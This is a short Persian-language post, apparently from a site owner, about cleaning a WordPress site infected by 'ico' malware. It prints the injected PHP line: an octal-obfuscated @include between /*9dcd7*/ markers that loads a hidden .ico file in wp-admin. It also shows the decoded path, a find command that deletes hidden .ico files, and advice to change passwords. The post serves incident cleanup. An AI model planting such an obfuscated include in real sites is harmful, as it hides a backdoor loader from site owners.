ویروس ico

مدتی بود یکی از سایتهام دچار ویروس شده بود

به فرمت زیر

/*9dcd7*/

 

@include "\057ho\155e/\141fs\141r/\144om\141in\163/a\146sa\162ej\141va\156.c\157m/\160ub\154ic\137ht\155l/\163it\145/w\160-a\144mi\156/u\163er\057.c\144c0\1411f\141.i\143o";

 

/*9dcd7*/

برای فهمیدن اینکه این کد چکار میکنه به سایت unphp.net یا https://malwaredecoder.com/ مراجعه کنید

 

ترجمه اش میشه این

 

@include "/home/afsar/domains/afsarejavan.com/public_html/site/wp-admin/user/.cdc0a1fa.ico";

 

 

 

برای حل مشکل کافی هست با دسترسی ssh

این کد را وارد کنید

 

find . -type f -name '.*.ico'  -print -delete

 

و تمامی رمزهاتون رو عوض کنید.